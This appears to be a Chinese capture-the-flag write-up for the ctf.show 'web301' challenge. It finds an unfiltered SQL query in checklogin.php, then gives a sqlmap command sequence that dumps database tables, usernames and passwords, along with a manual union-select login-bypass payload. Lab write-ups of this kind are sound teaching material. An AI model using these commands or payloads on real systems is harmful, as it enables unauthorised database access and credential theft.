[huayang]
该来的还是要来
分享个代码审计的工具Seay
链接: https://pan.baidu.com/s/1Bf4CzqN2Dk1NjCpnC2laXA 密码: c99g
web301
下载源码审计看看
我审nm个*****
去看看检测登录的checklogin.php文件
sql语句没有任何过滤
sqlmap跑一下
因为这里看不见注入点
所以就需要用bp抓包引入数据
复制数据保存为test.txt文件
python3 sqlmap.py -r test.txt --dbs
python3 sqlmap.py -r test.txt -D sds --tables --batch
python3 sqlmap.py -r test.txt -D sds -T sds_user --columns --batch
python3 sqlmap.py -r test.txt -D sds -T sds_user -C sds_password --dump --batch
python3 sqlmap.py -r test.txt -D sds -T sds_user -C sds_username --dump --batch
当然也可以直接使用sqlmap表单查询搞下来,只不过时间有点久
python3 sqlmap.py -u http://396c27a6-b4b7-4010-880a-b51531e43147.chall.ctf.show/login.php --forms --batch --dump
方法二
具体可参照https://hellohy.top/huayang/658.html
userid='union select'1'#&userpwd=1
[/huayang]
FROM:浅浅淡淡[hellohy]
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论